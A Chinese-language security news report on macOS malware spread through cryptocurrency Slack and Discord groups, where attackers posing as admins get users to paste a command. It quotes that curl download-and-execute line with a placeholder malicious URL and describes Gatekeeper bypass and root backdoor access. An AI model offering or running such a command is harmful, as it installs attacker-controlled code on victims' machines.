安全研究员Remco Verhoef在上周五（6月29日）发表的博文中称，他在最近一段时间观察到了多起MacOS恶意软件攻击。恶意行为者通过伪装成管理员或关键岗位工作人员发起与加密货币相关的Slack或Discord聊天组，并通过共享代码片段，最终导致恶意二进制文件的下载和执行。

用户被要求用户执行脚本代码如下：cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Curl会将一个文件下载到/tmp/script并执行。该文件是一个大型的mach064二进制文件，文件大小为34M。让我们来看看VirusTotal的扫描结果，是的，没有一个防病毒软件将其检测为恶意。

使用WhatsYourSign，我们可以看到恶意二进制文件没有被签名：

通常这样的二进制文件将被GateKeeper（一项新安全技术，可保证用户安装来自Mac App Store或者拥有开发者签名的应用）阻止。 但是，如果用户通过终端命令直接下载并运行二进制文件，则GateKeeper不会起作用，因此将允许执行无签名的二进制文件。

首先，恶意二进制文件会将脚本设置为root用户。如果与攻击者的C＆C服务器连接成功，攻击者将能够以root用户身份在受感染的系统上执行任意命令。

本文由 黑客视界 综合网络整理，图片源自网络；转载请注明“转自黑客视界”，并附上链接。